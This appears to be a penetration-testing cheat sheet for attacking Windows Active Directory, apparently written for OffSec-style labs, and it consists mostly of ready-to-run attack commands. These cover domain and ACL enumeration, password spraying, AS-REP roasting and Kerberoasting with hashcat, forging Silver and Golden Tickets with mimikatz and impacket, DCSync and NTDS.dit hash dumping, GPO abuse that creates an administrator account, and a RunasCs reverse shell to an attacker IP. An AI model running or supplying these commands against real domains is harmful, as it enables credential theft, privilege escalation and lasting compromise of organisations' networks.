Active Directory

Enumeration

Manual Enumeration

# Display users in the domain
net user /domain
# Display info about the user jeffadmin
net user jeffadmin /domain
# Display groups in the domain
net group /domain
# Display members in specific group
net group "IT Department" /domain
# Display the current domain object, including the PDC emulator (PdcRoleOwner) and domain controllers
[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()

## Enumeration with PowerView
Import-Module .\PowerView.ps1
# Get info about the domain, its users and its groups
Get-NetDomain ; Get-NetUser ; Get-NetGroup
# Domain computer overview
Get-NetComputer | select operatingsystem,dnshostname
# Scan the domain for hosts where the current user has local admin rights (noisy: it attempts a connection to every enumerated computer)
Find-LocalAdminAccess
# Check logged-on users / SMB sessions on client74 (on recent Windows builds session enumeration is restricted to administrators by default, so a low-privileged user may get empty results)
Get-NetSession -ComputerName client74 -Verbose
.\PsLoggedon.exe \\client74

## Enumeration Through SPN
# Listing the SPN accounts in the domain
Get-NetUser -SPN | select samaccountname,serviceprincipalname
# Listing SPN linked to iis_service user account
setspn -L iis_service

## Enumerating Object Permissions
# AD ACE permission types
GenericAll: Full permissions on object
GenericWrite: Edit certain attributes on the object
WriteOwner: Change ownership of the object
WriteDACL: Edit ACE applied to object
AllExtendedRights: All extended rights on the object, including User-Change-Password and User-Force-Change-Password (password change/reset)
ForceChangePassword: Reset the object's password without knowing the current one
Self (Self-Membership): Add our own principal to the object, e.g. join a group
# Enumerate ACEs on the "Management Department" group (ObjectSID, ActiveDirectoryRights, SecurityIdentifier). Note: -eq only matches ACEs whose rights are exactly GenericAll; use -match "GenericAll" to also catch ACEs that combine it with other rights
Get-ObjectAcl -Identity "Management Department" -ResolveGUIDs | ? {$_.ActiveDirectoryRights -eq "GenericAll"} | select SecurityIdentifier,ActiveDirectoryRights
# Resolve the SecurityIdentifier to an account name (a trailing RID of 512 is the Domain Admins group)
"S-1-5-21-1987370270-658905905-1781884369-512" | Convert-SidToName

## Enumerating Domain Shares
# List shares on domain computers; add -CheckShareAccess to show only shares the current user can read
Find-DomainShare 

Automated Enumeration

# SharpHound (run as a domain user). -CollectionMethod All is noisy: it contacts every host for sessions and local group membership
Import-Module .\SharpHound.ps1
Invoke-BloodHound -CollectionMethod All -OutputDirectory C:\sharepond -OutputPrefix "corp"
bloodhound-python -u user -p password -ns 10.10.1.5 -d offsec.lab -c all
# BloodHound
sudo neo4j start # neo4j:neo4j
bloodhound
# Custom queries
MATCH (m:Computer) RETURN m        # Display all computers
MATCH (m:User) RETURN m            # Display all users
MATCH (m:GPO) RETURN m             # Display GPO
MATCH (m:Group) RETURN m           # Display Group
MATCH p = (c:Computer)-[:HasSession]->(m:User) RETURN p    # Display all active sessions

# adPEAS
Invoke-adPEAS -Domain 'NeoSoft.local' -Cred $Cred
# ADRecon
.\ADRecon.ps1 -DomainController <IP or FQDN> -Credential <domain\username>
# Invoke-ADEnum
# PingCastle
runas.exe /netonly /user:<domain>\<username> cmd.exe
.\RunasCs.exe administrator P@ssword123 cmd.exe -r 192.168.45.161:80

AD Attacks

Password Attacks

# Usernames Bruteforce
kerbrute userenum --dc 192.168.147.97 -d corp.com -o kerbrute-userenum xato-net-10-million-usernames.txt

# Password spraying on Windows and Linux. Check the lockout policy first (net accounts /domain) and stay below the threshold within the observation window, otherwise the spray locks accounts out
.\Spray-Passwords.ps1 -Pass Nexus123! -Admin # (No accounts should be locked out)
Invoke-DomainPasswordSpray -UserList usernames.txt -Domain corp.com -PasswordList passlist.txt -OutFile creds.txt
.\kerbrute passwordspray -d corp.com .\usernames.txt "Nexus123!"
crackmapexec smb 192.168.50.75 -u users.txt -p 'Nexus123!' -d corp.com --continue-on-success

AS-REP Roasting

# AS-REP Roasting: targets accounts with "Do not require Kerberos preauthentication" set (DONT_REQ_PREAUTH in userAccountControl); the AS-REP is encrypted with the user's key and cracked offline. hashcat -m 18200 handles RC4 (etype 23) responses; AES (etype 17/18) responses need modes 32100/32200 in recent hashcat
impacket-GetNPUsers -dc-ip 192.168.0.9 -request -outputfile hashes.asreproast corp.com/pete:'P@ssw0rd'
.\Rubeus.exe asreproast /nowrap
hashcat -m 18200 hashes.asreproast rockyou.txt -r best64.rule --force
# Only list the vulnerable accounts without requesting hashes
impacket-GetNPUsers -dc-ip 192.168.0.9 corp.com/pete
Get-DomainUser -PreauthNotRequired
# With GenericWrite or GenericAll on another user we can set DONT_REQ_PREAUTH in its userAccountControl, AS-REP roast it, then revert the flag. The scanner below uses -eq, which only matches ACEs whose rights are exactly GenericAll; -match also catches combined rights
Invoke-ACLScanner -ResolveGUIDS | where {$_.ActiveDirectoryRights -eq 'GenericAll'}

Kerberoasting

# Kerberoasting: request service tickets (TGS-REP) for SPN accounts and crack them offline; the ticket is encrypted with the service account's key, so a weak password is recoverable. hashcat -m 13100 is for RC4 (etype 23) tickets; AES tickets (etype 17/18) use -m 19600/19700
.\Rubeus.exe kerberoast /outfile:hashes.kerberoast
impacket-GetUserSPNs -request -dc-ip 192.168.171.70 corp.com/pete:'P@ssw0rd'
hashcat -m 13100 hashes.kerberoast rockyou.txt -r best64.rule --force
# With GenericWrite or GenericAll on another user we can add an SPN to it, kerberoast the account and crack the hash; remove the SPN afterwards
ntpdate <dc_ip> # sync the clock with the DC: Kerberos rejects requests with more than 5 minutes of skew (KRB_AP_ERR_SKEW)

Silver Tickets

# Silver Ticket: forge a service ticket (TGS) for one SPN using the service account's NTLM hash (or AES key). Needed: service account hash, domain SID, target SPN. The ticket is presented straight to the service, so it remains usable as long as the service account's key is unchanged
# 1. Service account NTLM hash: e.g. mimikatz sekurlsa::logonpasswords on a host where the account has logged on
# 2. SPN : Get-ADUser -Filter {SamAccountName -eq "svc_mssql"} -Properties ServicePrincipalNames
# 3. Domain SID: take the user SID from whoami /user and strip the trailing RID (the last hyphen-separated component), or read it from Get-ADDomain
# 4. NT hash of a known password: compute it locally (MD4 over the UTF-16LE-encoded password, e.g. with Python hashlib or impacket) rather than pasting the password into an online hash generator
kerberos::golden /sid:S-1-5-21-1987370270-658905905-1781884369 /domain:corp.com /ptt /target:web04.corp.com /service:http /rc4:4d28cf5252d39971419580a51484ca09 /user:jeffadmin
impacket-ticketer -nthash E3A0168BC21CFB88B95C954A5B18F57C -domain-sid S-1-5-21-1969309164-1513403977-1686805993 -domain nagoya-industries.com -spn MSSQL/nagoya.nagoya-industries.com -user-id 500 Administrator
impacket-mssqlclient -k nagoya.nagoya-industries.com    # Auth with TGS
# https://medium.com/@0xrave/nagoya-proving-grounds-practice-walkthrough-active-directory-bef41999b46f
# Import TGS in Linux
export KRB5CCNAME=$PWD/Administrator.ccache
klist
# Create /etc/krb5.conf with the content below (or write it to another path and export KRB5_CONFIG=<path>) so the tools can locate the KDC for the realm
[libdefaults]
        default_realm = NAGOYA-INDUSTRIES.COM
        kdc_timesync = 1
        ccache_type = 4
        forwardable = true
        proxiable = true
    rdns = false
    dns_canonicalize_hostname = false
        fcc-mit-ticketflags = true

[realms]        
        NAGOYA-INDUSTRIES.COM = {
                kdc = nagoya.nagoya-industries.com
        }

[domain_realm]
        .nagoya-industries.com = NAGOYA-INDUSTRIES.COM

DCSync Attack

# Impersonates a DC and requests replication of account secrets (DRSUAPI). Requires the Replicating Directory Changes and Replicating Directory Changes All rights on the domain object, which Domain Admins, Enterprise Admins and Administrators hold by default
lsadump::dcsync /user:corp\dave
impacket-secretsdump -just-dc-user dave corp.com/jeffadmin:"P@ssw0rd"@192.168.50.70

GPO

# If we have write access to a GPO (GenericAll, GenericWrite, WriteProperty). www.thehacker.recipes/ad/movement/group-policies
# List GPOs: Get-GPO -All        # apply GPO on a target: gpupdate /force. The command below is pushed through the GPO and runs on the next policy refresh; remove the gpoabuse account afterwards
python3 pygpoabuse.py 'corp.com/user:pass' -gpo-id '469...D81' -command 'net user gpoabuse Password123! /add && net localgroup administrators gpoabuse /add' -v

Active Directory Persistence

Golden Ticket

# Golden Ticket: forge TGTs with the krbtgt account's hash (or AES key); they stay valid until the krbtgt password has been rotated twice
# Requires Domain Admin-level access (or SYSTEM on a DC) to obtain the krbtgt hash
lsadump::lsa /patch    # Dump the krbtgt hash in mimikatz on a DC (lsadump::dcsync /user:krbtgt works remotely with replication rights)

# From a compromised machine or our attack machine
kerberos::purge    # Delete any existing Kerberos tickets
# Forge the TGT. /sid is the domain SID (whoami /user minus the trailing RID); /user does not need to exist. Using the RC4 key (/krbtgt) yields etype 23 tickets, which may stand out in an AES-only domain
kerberos::golden /user:jen /domain:corp.com /sid:S-1-5-21-1987370270-658905905-1781884369 /krbtgt:1693c6cefafffc7af11ef34d1c788f47 /ptt
PsExec.exe \\dc1 cmd.exe # Execute cmd on DC, using hostname instead of IP to use kerberos auth

Shadow Copies

# Volume shadow copy of C: taken on a domain controller (needs local admin there). NTDS.dit plus the SYSTEM hive yield the NT hashes and Kerberos keys of every domain account
vshadow.exe -nw -p  C:    # keep note of Shadow copy device name
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\windows\ntds\ntds.dit c:\ntds.dit.bak
reg.exe save hklm\system c:\system.bak
# In our attack box
impacket-secretsdump -ntds ntds.dit.bak -system system.bak LOCAL
